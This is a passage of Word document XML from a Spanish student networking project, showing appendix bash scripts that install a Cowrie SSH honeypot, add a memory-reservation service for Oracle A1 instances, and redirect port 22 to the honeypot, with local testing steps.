          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</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info "Aplicando la configuracion del proyecto..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">install -o cowrie -g cowrie -m 640 "$SCRIPT_DIR/cowrie.cfg" "$HP_DIR/etc/cowrie.cfg"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">install -o cowrie -g cowrie -m 640 "$SCRIPT_DIR/userdb.txt" "$HP_DIR/etc/userdb.txt"</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info "Creando el servicio de systemd..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">install -m 644 "$SCRIPT_DIR/cowrie.service" /etc/systemd/system/cowrie.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl enable --now cowrie.service</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sleep 8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl is-active --quiet cowrie || die "Cowrie no arranca. Revisa: journalctl -u cowrie -n 50"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ltn "sport = :2222" | grep -q LISTEN || die "Cowrie no escucha en 2222. Revisa: journalctl -u cowrie"</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info "Cowrie instalado y escuchando en el puerto 2222."</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 Reserva de memoria (solo instancias A1 de Oracle) ------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Oracle recupera instancias Always Free con CPU, red y memoria (en A1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># por debajo del 20 % durante 7 dias. Un honeypot cumple las tres; con</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># mantener la memoria por encima del 20 % deja de considerarse ociosa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">mem_mb=$(awk '/MemTotal/ {print int($2/1024)}' /proc/meminfo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">es_oci=$(cat /sys/class/dmi/id/chassis_asset_tag 2&gt;/dev/null || true)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ "$es_oci" == "OracleCloud.com" &amp;&amp; "$(uname -m)" == "aarch64" ]] &amp;&amp; (( mem_mb &gt;= 2048 )); then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  [[ -f "$SCRIPT_DIR/oci-keepalive.py" &amp;&amp; -f "$SCRIPT_DIR/oci-keepalive.service" ]] \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    || die "Faltan oci-keepalive.py u oci-keepalive.service junto al script."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  info "Instancia A1 con ${mem_mb} MB: activando la reserva de memoria (25 %)..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  install -D -m 644 "$SCRIPT_DIR/oci-keepalive.py" /usr/local/lib/pfc-cowrie/oci-keepalive.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  install -m 644 "$SCRIPT_DIR/oci-keepalive.service" /etc/systemd/system/oci-keepalive.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  systemctl enable --now oci-keepalive.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  sleep 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  systemctl is-active --quiet oci-keepalive || die "oci-keepalive no arranca: journalctl -u oci-keepalive"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  free -h | awk 'NR&lt;=2'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  info "No es una instancia A1 de Oracle: la reserva de memoria no hace falta."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &lt;&lt;EOF</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PRUEBA (desde tu equipo o Kali, todavia por el puerto 2222):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    1. En el firewall del proveedor abre TEMPORALMENTE el 2222/TCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    2. ssh -p 2222 root@&lt;IP_PUBLICA&gt;     (password "root"   -&gt; rechazada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       ssh -p 2222 root@&lt;IP_PUBLICA&gt;     (password "prueba" -&gt; entra)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    3. Ejecuta "uname -a" y sal. En el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       sudo tail -n 5 $HP_DIR/var/log/cowrie/cowrie.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    4. Cierra el 2222 en el firewall del proveedor y continua con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">       sudo bash 03_redireccion_22.sh</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200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo H. Script de Redirección (03_redireccion_22.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="120" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env bash</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03_redireccion_22.sh - Exponer el honeypot en el puerto 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Proyecto Intermodular ASIR - Diego Perez Fonterosa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Redirige (NAT) las conexiones entrantes al 22 hacia el 2222 de</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Cowrie. Es el ultimo paso: a partir de aqui el honeypot es publico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Uso:  sudo bash 03_redireccion_22.sh</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set -euo pipefail</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info() { echo -e "\n\033[1;34m[+]\033[0m $*"; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">die()  { echo -e "\033[1;31m[x]\033[0m $*" &gt;&amp;2; exit 1; }</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$EUID -eq 0 ]] || die "Ejecuta el script con sudo."</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Seguridad: no redirigir el 22 si el SSH real no esta ya en el 2022</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># o si Cowrie no esta escuchando.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ltn "sport = :2022" | grep -q LISTEN || die "El SSH real no escucha en 2022. Ejecuta antes 01_hardening.sh."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl is-active --quiet cowrie       || die "Cowrie no esta activo. Ejecuta antes 02_instalar_cowrie.sh."</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ensure() {  # inserta la regla solo si no existe ya</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  local table=$1 chain=$2; shift 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
